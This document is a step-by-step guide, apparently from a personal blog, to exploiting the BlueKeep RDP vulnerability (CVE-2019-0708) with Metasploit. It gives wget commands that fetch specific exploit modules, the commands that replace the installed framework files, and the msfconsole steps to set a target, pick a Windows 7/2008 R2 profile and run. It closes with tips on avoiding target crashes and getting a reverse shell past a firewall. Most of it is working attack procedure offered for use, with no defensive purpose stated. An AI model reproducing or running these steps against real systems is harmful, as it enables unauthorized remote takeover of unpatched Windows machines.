Preparation
Linux
MacOS
    # Download
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

    # Replace
    sudo cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
    sudo cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    sudo cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    sudo cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Exploit
Start msfconsole:
    msfconsole
To be safe, run:
    reload_all
Load module
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Next, basic operations inside msf.
View the configuration:
    info
Set the target IP:
    set RHOSTS <target ip>
If needed, target also has to be set:
    Exploit targets:

       Id  Name
       --  ----
       0   Automatic targeting via fingerprinting
       1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
       2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
       3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
       4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
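Finally:
    run
If you hit a blue screen, try a few more times, or check which configuration step went wrong.
Pitfalls I ran into myself
- Not all of the files that needed to be overwritten were overwritten -> the target kept blue-screening during the exploit
- The system firewall was not turned off -> I never got the reverse shell (I did not expect the traffic to go through the firewall; I thought it was an internal operation on a single machine)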